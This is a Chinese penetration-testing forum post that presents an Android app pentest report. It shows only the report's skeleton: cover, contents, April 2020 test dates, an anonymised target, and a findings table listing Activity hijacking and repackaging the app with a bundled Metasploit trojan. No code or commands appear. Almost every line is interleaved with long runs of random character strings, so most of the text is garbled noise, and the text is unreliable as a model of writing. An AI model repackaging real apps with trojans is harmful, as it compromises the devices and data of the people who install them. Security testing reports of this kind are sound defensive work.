找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4360|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
2 y6 Z) [, I: g$ ^7 D+ E' }) w 9 n* R/ p$ J i# S( _! j% ]8 Y- m$ ?

' Z+ j. h$ m, B9 q) S. l9 L, d7 f+ l! r! V
/ E! w' m$ c0 C J! N* I ) z' D* _0 N; I# y( s4 c7 F

1 c" b/ J3 A9 x: k5 z/ X $ g: I8 K Q. x/ V' p8 Y- F* J
8 r& ]3 e; e- m7 o1 I V, }( I) W) O( O2 S

( Q' m M& z8 x i# g. N4 e, W: h1 p$ t 文档编号:                6 X* x" I A9 U6 q3 _ z/ L4 W7 U9 ~$ q5 v- A, `$ U

1 O* k! z/ u6 ]' [4 S% y" N0 E: @ 1 J, U# u% h& S) f: y" b

7 }$ A2 r% @0 k9 d( b; ` * K8 L2 f( W. Z5 u8 G6 S7 o0 ~   & V& b: v4 U5 F3 Z3 |- K % c; c* D) a3 l7 ?) N

- ^, S8 Q7 d7 n( r & I/ Y# Y* L# Z

& I4 O; }2 L- W& y* G4 [; a7 T 5 _+ z0 c; b3 G% ~   & J" I1 w, L& p9 A / e" N X7 Z3 X: H+ k$ o- l

3 P u; L# y" r r6 d; W* d7 b$ y9 }1 \) ^# Q: Y0 r& W% {

( x7 P" }8 W; B: P3 E: q# Z. R, I& R2 h) g, |   % ~! d- q$ y l; _( T k* j ' D* X* ~8 O9 Z6 {7 M

! \: |% ~, i! }3 \% L1 H: S1 O 7 I' n, ]& Y ]; L( k0 s8 A# Z

9 o7 I9 |2 _) K0 w3 @! u y+ z4 @9 O9 \5 V$ x   % K/ V7 l$ `! T: ?! j% I* H; K* i7 [# J& z2 B

+ F( V: b% _# B! C7 O5 V& X# T1 @

: X$ g5 s3 V' U! A. d) S9 A) c4 P, B. r6 n9 i4 F/ R   & |- c1 b# F- H) K( U* R& ?4 k: ^& m: n. ~0 K

: A0 m% ~2 ?( }9 H- P " @4 D* C: H, I

* N6 U/ e- ?5 w : |% B7 l9 [, b1 h 某某某APP渗透测试 1 J1 g, g& A7 F. g0 M# W; D/ a( y. Z% q9 {* O

8 f- a0 g- V9 { ! Y- s( A( k1 x2 {

6 N% y" u1 [9 N+ b0 E . t0 L4 R; g* q   ! W q/ |$ b1 u 7 J, B5 c( Q& Q+ i

! e7 U5 I H+ \$ M0 g2 @* ?4 X% C 7 y, [3 `# L8 g: r7 A% a

% ?' x2 a9 C/ N, X' U 6 v1 u- ]/ l$ C- k   ( X9 n" \# {: l0 k 1 X3 K n' w( M v/ M

7 k4 \0 W+ b/ j1 w3 N5 B9 Z2 G) D B% T" ~& y6 ~

, T H6 [ f1 n! {: C& b 6 p- r0 w9 X* k$ V v* J# V   9 M1 N0 J5 v1 r5 q1 b, \ 7 [; n: G5 D9 r) x! h8 ]

; j0 Q% [# a( v$ `2 ^6 l9 l4 t: Y : @1 a" d! [0 |# ?8 k

' [3 f% ?4 p* F" P @ - b! U9 ^( v- H6 T   1 \3 n% a2 y/ w* ]& _ 5 z. e5 @) R) d8 U! c7 a1 _

# ]0 m* q5 Q1 L! y3 h+ ^6 ]7 C' i! F" I' z& o' U

0 f3 z; M; ~4 z9 z# B; I! l, m / ~$ h# T# E9 _6 u) s+ h 技 术 报 告 ! ]1 B& i/ E3 y* Z3 A 8 P, A7 [# z1 h" }$ k

* Q0 ^* X7 m9 z. ~7 J' b ' L( R& }! y( j* K6 v$ K

$ r6 W! _8 ~+ n! q+ }" Q9 h- D1 y% i. m   * Z* u" k2 a+ K! O" O 2 P, }0 k. ]1 a2 c* K4 O% I% K, T

' R- h! n; U9 b+ c( h, k( u + w5 ]2 ?/ s& F% ^" X0 t

4 h% O8 \5 ^, o " s* ], E: p" _1 W, f   4 h; q7 x3 Q" M0 Q' f1 J+ q- _/ s+ `: K9 t, H

7 e$ Q( P- J) M& d0 [, x , U' y, |7 U. f) v: z! D' O

7 L5 C2 |! \8 X' G" A A& n5 {) G x9 X& N( A; V   $ ?/ j0 X" y, E. X ' X$ h2 |8 H8 [: I1 U* @4 L

6 b) O" i0 _9 C1 _" Q - S. E4 i/ f, X4 v. L

C4 z# L( h# x" F8 u9 ?, b / O3 ~- O9 Z3 z9 t T   % S7 l( E; J7 ]" J 3 \: c: \; _; Z6 v% K

% P+ D; W9 t# D H9 i5 A ( n0 L5 a8 e W: W* {, d! [

) N. m8 }( h3 B: a% V5 B L7 ~" c5 w9 P1 y' x4 e   ' Z8 @- _( l6 p& Q% p) @7 q* B4 R( d6 W' T

6 h- v7 _7 z; J# \3 n5 F; I. L7 Z, L2 v! ^- |* J* z" g* Z

% K% P! @4 @( S' _$ S& ^6 z ; d+ k* X7 G+ S8 N, P t   4 \3 i: A+ ~$ B$ m. r0 h% |+ X$ v; v" R* y: ^# F$ v3 M

9 ]* _% r8 _2 I* P; J7 [6 l9 g5 X* o4 K4 b% @5 a7 Y

0 d# P! }4 { i. l/ G' {1 L; r# ~" @' V$ L: N/ n+ j   # D. {; W( z9 [7 t9 ` 3 @8 w; p& `+ s& H

. H9 X0 k4 y8 j- ^. a5 B9 R/ R9 z0 { 6 s2 I( s: |8 h+ o0 O

% @% u' c: P- b/ C( {/ ^/ D! B , a. A* k; Y" S3 P$ X- F   , Z7 W2 T) j$ X" _4 F! {+ G6 E q' @; l4 a8 `8 }/ L

$ U" ]: Y4 \( y8 X4 i 9 q: _( v' I- d+ {* D( c6 y

# m/ c- H$ o) ?6 o" l + S8 C' M. e# a# I. N' l2 p   1 w$ a6 h* N! ? / E, b6 X8 j7 c2 O$ m

& b0 C' g, J1 {6 `! g9 I / U h( {- U7 F' k+ f

7 y( J3 T4 D& m% v( |; Z; L; K& P- P% ~+ ~$ P* M3 W   ; X0 Q4 e, Q0 H2 M 2 R e1 {" j" J' R0 g1 Y6 x

! `$ c* f$ k" o: B' `$ r5 N" Z 9 l5 |) u1 o7 v0 {# S; z

k& X+ h' L8 J; M 5 Z( @( ]# R6 R2 z   ! j+ P- Z4 t& L F " S! H9 t$ Y# p# K: Y C6 F

$ G5 i8 X' {4 `, i8 M4 o ; {- b6 y: N# a

! n9 c& d1 v9 [* J( }( s ( o6 ]; Q4 O8 {2 g! h7 w   $ W5 x5 R+ \, ~7 v; Z% u. U! ?8 c. {

# D. z: z1 k; [9 l/ ~* { 5 V% X( _% _0 h4 |% s+ T

|* @* |. | z + A4 [- G/ L" g, T0 ]   ( R, g. Z- o2 E* d& M% ^5 l& M* D; G$ l& E; L9 u0 `

) c2 m, m) O3 s 9 l0 ]" b- z- S

0 y2 [" { q7 C5 `% H8 x1 r 0 Q1 K+ ^* l3 e' G8 h: @   8 o% I" P3 c. ` 6 ^+ p; }* ?9 s$ s5 s- Q

" C( w$ s5 @/ U! q! d$ v# |/ J4 ~) I M9 u: z( V) X

' N" }& q' e- v4 P/ w* E6 _ 8 t: P L: s7 }5 X9 \   7 `5 s6 p- Z! Z( p! ?6 r8 U' t 1 Y1 E% N& v+ G' A3 p

" Q* c2 R; G& Z" X1 N& j& Z u/ J- S d( y; T: P5 h

+ A7 J- c8 S6 _ f u) M: H9 | x8 x' _   2 e: |0 I/ @% X2 b4 R# ?. u7 B X) i$ O$ v. m/ n$ p8 M3 l

2 D! y, Y" w2 ?8 e- T" G* ]5 C; t( j. C7 o

) N2 J% g; `: f6 H0 z5 K- N + d- W9 h6 y1 r) B4 q( }& l$ U6 M   3 Q) E8 X7 E5 s. _ 6 n$ s& e4 Q# F Z

. N# U+ i6 c, Z$ Q. ^" a& ]7 }* {* Z: `

, b0 [, @7 X9 T% f 4 l" F! @& o# @" e   - P- H( g' d- {8 {$ I' x 2 g* T6 @* @' m7 n, ^$ A

# [4 C4 Q( e$ U) }/ [7 l. ` 3 ]4 O* `* h' B; K/ p8 _

$ Q+ z1 l F i! j6 k ' U- p( z/ D# g. F3 [& x" D 二〇二〇年 / n1 `7 v+ R0 X1 J" h3 q 7 q8 x9 J; @% J- N

- p0 |$ }7 B4 s" U6 A8 r) d 3 g! T* _) a+ ?; h0 x! Y; `' j4 a
( P( [( R, H( J! V7 X3 A ' z+ B, m8 ?$ a. {0 \
. e6 ~* c8 p9 u; V. w 6 S! I: ?' d! k t' K) O ; W9 y) M+ o9 N k1 t6 m& a, o5 @
6 R: d7 ~& s8 w7 ? 6 v6 M. [5 E7 u! g3 b+ `, p
& n7 C' c3 E& P. j % B, L% V8 q6 l
' p3 C9 d6 H. A ) O5 J5 n# J/ i " J% U! s1 X; x: L9 a/ F( O 0 |1 w6 u8 B; _! H7 ^
; @: m5 U) R6 |' W5 O- c9 J2 J) u4 B3 Z t) k5 G# }

# D( q( W; {8 R( V9 ^ 5 D. [) L- R$ m$ {: m 目 录 1 X" @: |! U4 A7 z 3 z3 S$ K8 z2 B L7 ?

$ _# a- | f% Q9 I 3 P; t+ a' {; m2 O8 n4 d+ u ) I& P/ R5 X7 O5 r3 h& e! i* u& z5 p! g3 g& u

9 s3 ]% S# |) s . Z- |/ ~& G5 p7 t S   ) s, @: D( k+ I9 _ n' d 6 {0 U, \1 W1 c+ c

# d) Y7 d* Q1 w / S& |) Q' J- J" F8 j! p b

* J8 n7 _' R" A& ^0 T) _1 R 3 p6 k: l+ \* W' n$ i 1 概述... 3 + |+ ]0 [" p7 m9 b+ p Y$ `: G 6 m9 d) T7 ~- S, T. S9 }

# z& D& F9 I! l0 ~$ o- f ! ^2 N" T0 g9 O0 i! L: M/ H

, ]) r9 z5 U* C1 n5 i; T; X) o - G4 e+ q; n, g" H 1.2测试时间... 3 7 w8 r2 s* o1 E% O$ V& t 0 g8 l0 @- d, ]5 p( k

3 T7 @1 S N$ ^; U( I) k ' I/ n) b9 g9 N4 m6 w3 S

2 @4 U) A2 w8 ] : H e7 \ Y" V' w+ R" H1 n 1.3测试对象... 3 # U5 J6 ?% c2 w t9 K8 V, i' t % P" j( o# } B7 G: m+ R

& u) m4 n1 l H$ J - d+ U+ x Q7 j

6 E$ i5 Y& v, l9 i' ^4 C3 P8 N$ U9 h+ {3 f 1.4测试结果... 3 2 r+ D3 v' {. m& d8 b* A$ d : |" q0 B" P! t! d6 I: w# f( C0 F2 {

, x2 S, ^, B) }" k" F6 ~0 M; G ( x' p6 m4 |' n* U

& e6 u2 s t4 D: t$ O- S . n+ d: k( [+ I! l, v" D! m 2 检测结果... 4 ( t, M" d% K' \5 F / H: v e( K& @) {; y4 {4 U! f

5 K/ p1 F" s6 v! f% T- Y6 i. F2 V7 f; d2 R' @+ H1 P, j* L

# _, z o6 h. F, n: Q7 i & ^: M0 }6 @' L! J8 u( @3 A 2.1 某某某... 4 ( s9 [; \% o8 c, L, X p5 }& }9 ?: c. s, t6 g

, l3 W* J9 V4 S! z+ M5 v- K 1 W& j2 b9 v" O, P) M

1 }& ~; w: B4 c$ h! w" C& D9 e ) ]! Z! |3 U$ x; G7 } 2.1.1检测目标... 4 : T1 `1 w) q/ a3 N$ J1 y * n/ R. b+ v4 t4 _+ Z9 ~

' }2 x& K1 b' O5 C9 C5 `9 `" C* S- h . R$ G ? O' h( g1 y: ~) s( J; s5 X, L

1 ~) u. E0 i1 X2 U, i# q% h) B6 m3 i 2.1.2检测结果... 4 ) j7 L$ b& i9 o$ C4 U+ }* p 1 q* g6 ?+ X2 N+ i

- c& t! b8 [$ C1 w/ V& B! c7 h/ K( F& U; K

3 e ^% I" u& ]7 p' d+ q( b4 P Q 2.1.2.1. 4 * }) T$ n3 G& W5 C# \) F" ^ ; z6 V# ~% A6 z* _. b% p2 e u

; I0 b- c3 T6 H+ n; h. a! }+ U0 N1 [ 6 t3 y3 a& z- Z5 ~5 ~

" |" p% F* @1 d) ^ 7 ?* m2 L X9 l: R9 T: N# o& c1 v 2.1.2.2. 6 : |: g% y1 l3 A7 e( o6 G j7 ^/ C/ d2 M) G! {: ~

& k) I* {, z& A $ t% u8 i" F9 d/ X0 \

# x l8 l( G" S. C) D! _ / H& j* }5 W4 o2 e $ N2 P$ s/ U1 ]# K' e, D3 h' S 0 Y l6 J5 O1 H0 Q

! S5 L' N7 r4 O% y5 x8 |$ h1 i/ e# |6 f5 ~ & c8 d7 h! \/ ]6 t ) L9 f6 ^# D3 F% c$ P
' v6 l4 B9 f( O8 L ( T! ^6 m" e$ o% }+ G, c' V" G l; \2 f& Q
6 |' F. t; C2 {+ T' J. T* B 2 M6 |$ G9 [/ x/ A/ e4 i6 h 3 R1 T) y9 J. N8 b% T: t# s7 A : x) |. P- P5 P. g4 K

% O5 v f0 z# o* A% P8 ]* I4 A 6 S+ w8 z' f$ a: G3 ~# L/ x 1 概述 ( Q X* U2 m! J! K' @6 ^: V ! k& P- N; v" }6 x e# C0 r

. t; F& ?5 R, }+ J: B9 i% p& _. ~3 Z* {& @. K8 z% a/ ]# o

+ ^# i& \8 w5 R- U! X7 K& D* S2 z: l: n# h 1.2测试时间 4 d2 Y0 T+ O; L- I 4 Z4 C X6 I" l0 ]

! K& X$ u5 G9 p7 P4 C7 C 6 W* I/ i% u) `( N) Z9 F 9 b) b; I" D: W1 `" f9 ~6 w6 O1 m8 B1 s( U! A! c+ K6 D$ S' }, N0 {, ~: C! Z4 Y( N- T f( x; \9 O! M5 y9 O1 e/ q& W( K0 e8 u( r5 L( y$ @6 ~5 e( q: W. E( A" _5 `% q4 k6 M ?% I2 w: P5 T2 F0 g' m6 p; ^# X; ]7 l! L! |; k) T7 e! ?1 ]5 {, `; V7 f3 D: T, E* ]# q8 D) @6 \5 E0 d$ l* y$ o5 P9 g+ R$ j" Z& l7 E' Z; ^; W' X) z* c% C3 d: C! O& c- L& Z, N% I) b ?7 y8 r1 r& k4 _+ F9 t, l: s! h) \' ~% }- n. D2 {/ C% C% N! q4 _: ?1 t) |, L! c5 d- B6 C+ Y' p" [) C* J w9 h% M# |3 Z- p4 d+ _- l; _0 Z0 I& R0 T1 E& U; D0 K9 I- }# Z6 @; @4 y' R5 B* o4 W7 L2 l6 v# s: l8 k$ @8 J# w/ S1 A7 _! m1 L! C8 _& [* Q y% z9 \9 b! N, I( a# _4 ?. @0 i' t8 q) U& O: d. O# M+ @- A: a
( `# M4 ]! K6 d3 Z 2 j. Z' P2 ~: f$ O2 U1 I1 w

! u6 j2 H# j5 u [- I# h' o: e: ]/ { K5 W: D: Q0 [; q$ M 渗透测试时间 5 L, i7 M4 g( [6 F 9 T8 a, v3 {' B

) I5 v. I9 v9 `2 B! n# j : {" A2 k* g; ]; ?0 Z3 Y
, T# w" u7 v$ h- O+ U + p: @" V; F, u9 Y/ Z

; T" n w) T# G. ~, n3 Q' K+ z& V6 F* h" ?1 u8 [) }2 k7 O9 } 起始时间 4 [6 d( F6 R% r4 D5 r: G 7 z4 D# p& D* x* _ e/ g

% _6 \ [) R8 ?/ U) n4 c% P" i" A+ ?; U1 k 		/ t# B. P/ e$ j 9 Z( N# m0 ^! D0 v

9 t) g* ~% b8 w3 I" h' y ! ]$ _2 p% M' Q9 n1 @ 202046 9 w8 t' \2 Z2 v ?; c0 n$ h8 I ! T+ P- L' p2 n. O6 M+ s/ x' a

7 x1 p3 y/ r8 n( R0 T! w& \' U' m, K5 }( U- K0 I1 R8 @ e
( r/ q5 X, y I+ l* }5 w 0 @) `5 ^2 j$ [* B' V r- z

5 B5 ?. V9 s% n( x# d# ^* P* _ 2 \. O. v7 Z# J3 K2 w. { 结束时间 7 C1 R! _! U6 S* @) s 8 e5 j9 F6 }/ O9 w

0 m" ?0 y" w7 T/ X+ H8 v& a ( G: F5 S( s& H! p4 j 		6 U9 e8 C. u9 h/ J( Y$ r! b; ?7 }" y

! u- \1 w3 B/ h! {6 y F : T; R) b6 G6 Q5 c7 H 202049 / u. S3 c" d8 ]" ? 4 r# ^' M# I. n# W% U) F( q1 `

- c+ |# e1 g, G* y. \. ~ 1 ^1 [( O! @1 I" Y q
1 Q+ [( w9 _, }- F! @ ) [5 c1 {0 p8 N8 u" ?' M/ ~

/ n( c7 M4 z& @5 ?' a! ~! i1 M5 G% I8 R0 ?7 Y. I, e5 z% n 1.3测试对象 ( W( p# M) z8 }, s$ e 6 W8 K+ p( j$ X$ H$ c

$ n- S: A1 _9 u$ R3 x, T ( k9 e- a8 K2 C/ B& v! e+ o ?+ U9 k

+ C& u* w1 z3 n; f/ D4 Y. T% _: t) v( F! V 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 5 ~! A8 O% Z, s# _/ P: K U# _' ?5 b% k7 g5 _. ^' M

& ~- x: A3 T- }0 b; W- u5 ^ ; c0 R* A5 i% L' d8 g

' s# L/ ] Y% S' o' R& O# ]+ [! d; d3 o7 Y 1-1 检测对象 " ^7 T9 f& g! ^ * @7 \# u: G( Y1 i

+ c$ H% @! K! f 8 i Y" Y2 s# z' @% H7 I& G 3 j, _0 o, J! D% x# T1 u- U3 l$ x7 h8 a1 p/ u+ L2 ~! O2 |; }/ z/ r* l/ F# b$ a! O+ Z# m- c9 {/ H7 O3 b) J5 @# G5 \. O6 s9 P7 C1 k! V: O& S6 J6 X8 i, x# [2 h8 @; C/ c' L+ e' `" S9 a `7 K, Z6 _1 G& g5 g5 s% R+ n/ n R, u# H% t* A! {0 ~( N b1 p" K% p7 e1 f, ^5 c& Q7 s0 o8 ^' B" I3 D; I) A r8 b# r, ]) g0 i2 N) ]+ g) b8 B0 e( W5 `1 b W) g; u0 w; t9 E! w+ s4 L* Z+ ^! V3 a! I/ \- u" E4 y# }. U9 _. B; o# \ u0 ?9 h( H& f7 z$ v5 s( e+ e2 d$ M" L$ a4 f" S3 @9 J: C% B6 I* V, |9 ^' A5 R7 O3 u! e; c( L- M$ O3 f% P- u; s0 e/ i; q1 ] Q" U% `! n8 ^% z, t% X% ?+ @1 X' n4 d; {2 M w7 |- w% z+ _ p5 w. V8 |9 `* U U& U, w) r5 @" m% D2 x( Q( R8 K: s# ~: }1 \( I7 m6 z1 c# j$ y" M+ c' d. i! u+ j% f* w$ P5 S0 |, D5 b& E; H# Z, P( U9 B7 h& e7 R9 B; w3 N7 }. e2 ^. N3 B# l
! {1 `# t; j1 P5 [; V5 ~ $ ~& ]/ h; H6 L: G3 w2 B5 p

" j, ^9 u8 h; }" m 9 u1 `( R& Y- t1 o; Z7 u- l0 [ 序号 " w/ Y1 E* a1 s2 y! r2 u 6 N0 H6 I) U5 b* x# J

" e1 ?( c( m. ^- E+ ^# Z' f. @" e, t! P- l8 F; J# J9 M 		! \' x5 N5 n/ D* ?; R + a( q* E5 F% c( c7 a

+ T" G+ U. s$ c; C 4 M0 Q" Y8 v' S: r2 J* { 测试对象 2 K D3 g, \' c' A" [) C/ ? 0 H, B" p3 G5 w, k1 [( r

6 P) z2 j1 y( ` G$ n& S- o' ]3 d7 k, [; t 		+ H7 q; o% A, J2 r ( i( |+ G* D% S* M, ^' Q3 R

, n, Z- D) b9 }" R8 v5 n+ O / `7 m! Z( w/ G# O6 C' g/ L 测试地址 2 l, i) g$ Y. K6 v: K: }+ ] 7 H6 t8 S1 p* I" [) V! g" g# S

' X& [/ M# Y: b% b1 ^6 Y- ~- ?! @ s& X, Y) n' Z$ J' r1 a 		0 e" l* a8 p8 Z$ K* D ; x* u6 `2 V( j

5 {9 o1 S* [9 o0 \# [ 9 n+ e: r9 I3 I2 ?. x 安全漏洞 7 j L3 M* r+ r( ^; Z# L& K" F) a' N: ~8 Z5 F j

2 I* L2 D% O- t, \ " h. S7 q6 R1 w! [1 E8 V
" ~( u! m2 P9 H9 O$ j6 |: v ( ^4 h$ x) Z" j5 H0 \& s d6 K% d

1 P% }9 F. E, f4 \) a2 N' d7 N 7 o1 Q% o! L4 T' { 1 4 ^% T7 B5 t! P3 `0 v8 x3 b; ?. Q$ i C, E! f0 B. b

, ]8 ^" [7 E9 W5 \3 ?$ \+ g* [ % `: e3 o& w; x; @9 |. \ 		- A. @/ Y x* n 1 S3 [* e& S$ _- s5 W: v. C

. y- O6 j8 I! ~/ N 3 d3 I8 O1 Q% R. {3 l+ c* s* O) i 某某某安卓APP ( y+ A' } f6 A1 `& v: v : [4 ` }5 H7 b6 w- V3 g( Z& a, j B

* K; G7 T- _* D$ X; V 3 Q% L/ x# t8 T5 ` 		K7 T5 `: [2 z: |$ j$ w, Y0 x1 d8 [5 `

( b+ `; A* ]; \ 7 }% Q0 n- r. l9 \6 T8 Z5 p" f   * U1 ]1 O4 ]" B% D& H( h ; I# j! S' C3 C) U1 A7 ~8 d

0 x$ h& \2 ?9 ^( q4 H+ p8 C! U & @6 S* E5 w4 m6 R) s5 ~! A1 r# ~ 		8 o% o. ^8 w4 e- N* z' V- c/ s9 O! i6 M" q6 j$ n4 Q7 }$ R

/ l; Q, z M8 u# S1 E% c - H$ i3 m- X* e2 v9 I, j8 } 2 5 S5 s0 [' ^$ a- A; b9 { 4 {. c5 V7 s% t6 d# I5 P

/ m7 {% J- w+ b5 [% u& [1 H 3 ~! Z; }+ n3 u* P* j6 i! b2 Y
" k' N" j& T) j0 ~ v6 z& x 5 m6 l+ P0 W) W

* A/ W3 v+ s( J6 B( C4 ]7 B {- y6 t( e2 F- \' k 1.4测试结果 ( @. }1 ]3 Y) ?# t0 x) ]# ?1 ?( b1 }* W8 r- V- s

8 \: K/ u9 V% o# Q$ `" S k1 L3 n; N8 d! v8 d

4 e8 Y0 L* X* z2 z1 ^# e- t1 E$ U/ }2 e5 i5 u& T( M: Q 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: + W' {0 @9 r! w* G5 A% v, a# l$ W9 y * G4 }7 p& x0 d% q. P' i; X2 s

4 }2 |6 {% }. @6 t 1 C1 Y: A% E) T+ z" w

- z6 v$ o$ a9 S3 H) N: l9 A7 K# x   ' R/ @3 j( D4 B1 Z5 R | & I8 w5 }1 D. P0 W' L% V$ z% X: w! f

% j+ {- S, |- g9 W, |. k0 S; Q5 v ; M' p n. @. v0 r
0 |6 M) l `8 j8 y ; s# k* k. ]: ~" P ( ?2 B6 O$ W% y0 d0 x p4 L/ Y# [; B; @. X. A7 r& z" W( M; u1 _! z' ^ e/ Q& H! O/ `# D' \( ?- Y; I7 |3 R n3 d' \! B: R- L( G$ g ?6 h/ L$ ^. {. _: M# n- t' q$ j2 Z* A& r* ^$ W& Y% [3 i k6 k$ |+ z- H! \+ m9 P! e2 a1 O0 [; f6 o9 H: j: _& y9 |6 y3 f; o8 _4 V' L: s: F( ~2 V0 D" D; q, y, _" i. F- P9 n* o/ w3 x: A) [& h- v# d3 g1 q3 u- n. p# w& l, v5 b7 f- M* f. N: ]- X2 k; N( H' _& ]$ a' ]' C+ {8 \/ w7 a4 S. p% |* Q& J9 L$ [& h6 b# b9 _; b8 z- B% Y! ?: @/ O* J+ s& L4 t0 {% y5 G0 ^+ W4 z' h9 V; T/ ], }" n3 H9 N0 c: r& G$ P. U" o/ Z3 ?2 r& q: ^/ Y1 X. a5 a. h! F9 B$ y- ]/ G- {2 f8 Y( e) L' o" ~. ^. S/ w0 u" p7 Q, v* y, w; c$ M+ K( a3 G9 |& j$ N. Q% a) L) S% w* T$ y8 C# @& A7 n& `# G: ~) C- f4 T8 F! |6 ^7 }# H+ A" D- N+ X3 F6 L) ~3 m& k% m0 J! d! |* K2 \. Y( \6 Y) G6 D# e+ {: v9 s( t/ J' M* |; ^; O- a4 i8 a+ D: r) z8 V$ i2 e/ z6 L+ ]7 A: K+ T; a2 O/ Y; @: T5 B) V7 p0 Z) M/ \+ ?9 v9 b4 z: R! ] w/ W5 \' X9 D$ r) [" S9 l- K0 t* P' f6 q) r# M9 o9 a! i, r' B& [, |3 @0 R7 A- W% G, c4 k5 Y5 E$ C4 b3 b/ L2 }6 n }$ Z) {7 p) x% `/ a% O8 ~. _ _4 _0 i$ r) w; j0 `" n; D! `7 o2 X" A7 P6 m7 W2 o7 Z4 ?+ x# G3 w
! C6 v7 {/ w+ x; k1 C ( y0 U/ h3 n/ C0 ]4 `9 {2 J" u

$ w0 k9 f( t1 O( }$ ? 7 S! q/ T, U" ?) m- G% l! d 序号 ; M& t- k! G: x/ S$ V" A 6 s9 v. T! I: @3 F* [: |

! X8 [8 S; K0 x* M( C , j" S1 V; B I Q' @+ z$ W 		* F1 Y& X9 e3 k# P0 h! w/ @7 m4 O ! _" o m/ Y6 P% f1 s _5 I/ w3 q

7 ]/ _2 r6 p' I: a _ 1 r& t! L3 h+ ^( R6 L, n 系统名称 / x+ o8 s9 J8 m# h 8 o0 b6 w; B& M% F' F3 w) H

, a! F+ J, N4 m0 j. x; { % N/ x" q8 P" w" x 		( z; x: w& k, m- [, N/ G* u% O+ c " z; C& m" M6 z; w, x

$ W6 X5 {& F+ [$ X ; l4 u9 H* U `( }5 W) ? 漏洞名称 2 p( t) \. i# A/ p & D2 S. t) R& t! Q

! ^, K( ]3 H0 d# W & Q$ d: d) f; Z ^# R5 ? \ 		J* |/ T, a# Q ) M* _5 S5 c8 G" o0 P

; O6 z) j. @ h8 q, d' a" p/ ~6 f8 n) | 漏洞危害 ; J$ o3 D; E! ?9 w9 F% R- L) C. C1 {/ I% F

: Q8 Z `$ M1 X6 u' R$ F: b1 O' G+ d+ G5 d$ _ 		, C1 h# G R3 C( G0 I8 { " Y1 k* k4 ^4 z0 }4 y

. ]) V* R6 i( Q# t9 S4 ? * ?: O, A3 f1 t 修复结果 3 i9 X: J2 J& Y ?. w% T5 F0 X+ A# L! P( P; F" h" q' a

+ K; I+ v5 S9 t6 K7 N3 N 0 x& h$ X" u. B6 P
! y+ o! ^$ n/ Q, A* w( q$ ^$ ^. h& ]$ {; r & m7 j! g4 B, \3 |- v- D; v5 n

# l p/ R8 Z& k& A% | ( r+ [4 [1 |" N# g$ D 1 # ~% ^4 {. j+ {) }0 S H ! P! Z" B& Z" F- p5 K8 ~7 E

# h/ r/ G% ~% g1 i$ x 2 D; l4 f1 W# t2 ] 		8 y; p4 U( R8 C1 D / m- I k8 i, x3 c. Z

' p4 c2 V5 x* O4 x* ~9 y! v - i5 T3 z1 j: D/ D! Z! v, d 某某某某某某APP % k. U" A2 ^. x' n ?: r: M$ N 7 b' H' \. V, i( i

, T: N6 z8 E. p, I) C $ y, G* P, K. K6 U4 W 		" j* U% J; F9 \, H 9 E) i2 B! ?9 w7 O! S

4 \" p- O3 g" ^& E9 V$ L3 u 2 W8 |6 k, ~3 E6 M2 C2 a Activity 劫持 3 u5 v$ Y- ]% P* a0 O# V3 Z3 J6 p" Y+ L2 a+ m' F

: L* K/ g5 @- U$ F! J _ 2 c3 B$ K! q- O' J. ~

3 J4 I! C, c& M, O- v: ?5 c ; U: H! O6 D- `; K   ) C" T+ ~$ j8 P& U; e. ^7 S9 G / E( ^" y: m8 k, [8 W

/ Z6 R# c6 [6 T5 r& O . } X3 S! P) I$ Z2 g 		3 z7 q! C/ v1 r6 ~6 m# i7 y% e* q) y# {

, e8 y% E/ ~! ^# l1 R8 }4 X5 _( p 9 Q, J; [4 d, W: T% \ " D+ [ R3 h4 w 3 y0 R0 S( v- C

! Q" l9 t( x' Q7 g/ P , _/ {1 u& O3 B% t# S; K 		: g$ \( [ E, ?; y. ` ) o- B+ S4 j# H$ Q# I0 S" y5 m

. o( v1 O& H9 j6 q- |, E, O# V6 q5 @9 ]   0 b0 t0 T" [5 ~2 b9 C1 H$ M6 |- N ( {8 b L8 w& H) V4 q( ~% r/ p# G! W

1 d8 Y0 f% ^3 J& M ! N' ^) T" Z4 G% \. i0 ` K
+ }9 u" C+ p2 P* h5 C- U& ?5 l* \$ w

; D# v- I3 A d- T 0 G0 I0 L5 b$ f; K3 j' V7 I 2 1 _3 ?% k, C6 d! t - i1 @- Y% {; L' u( ~: j& O6 y8 c

7 ?& I/ O8 |5 f/ n8 f / G+ c( h8 @2 m8 G/ B8 Y 		# N* z6 j ]& O9 q 6 g7 K9 k% D" O( G5 B

1 ]/ r" R3 F) z7 p. K - j$ f2 Y, ?" d. i 某某某某某某APP - r3 x* n5 B+ P 8 E4 i* l! V: R9 M7 N; ^

/ a9 f7 {( B- y. d$ `+ i; c 4 |7 Q! l; q z! M0 s 		1 |% m3 Y8 ?1 l: G& { . L, a7 n0 I& d d& A) _+ @

" m, J, U# Z' F: F) \1 R0 I 0 }2 p% u- Z0 b 反编译二次打包捆绑木马、篡改APP代码 , t& @6 l! O q & O/ }' ]; V4 g# a& N J

8 \- ^& h( r$ y# F5 b' n& R; q3 p) H/ _ 		2 f, k$ U% p9 _6 b6 y$ n 0 P# K9 X: b* V

$ ]' S3 s3 ^7 v1 J( ^ 7 k, r5 y/ P8 h; Q0 U+ I8 q4 y 8 ^$ h j, |6 N `' B1 p6 v & ~( D, X8 K) v B7 M! [

& b( x. v2 Y: g7 { ( i W% Z& ?2 Z% [4 f 		" _# P8 R4 m! G8 S G7 x- o6 p3 k7 d3 n! S, l

- ~; F1 T9 N$ C , e/ Z- N; g0 W4 v1 b4 j   / `; }2 f% } c4 g: d) S2 C+ k 2 U7 R# F; {7 k8 {; o* p

* p9 I+ X. V: o' c5 L; c 8 d* t: r5 {6 ]+ ~! r K
6 I2 [0 [ ~ {8 d7 |. R( S 6 m% ~% I* z( f* A9 k0 W( ^! f- l$ c
# m9 x+ [0 K; a; J " D: ?) k( t) X* Z9 g/ q( h& r+ c5 j2 @

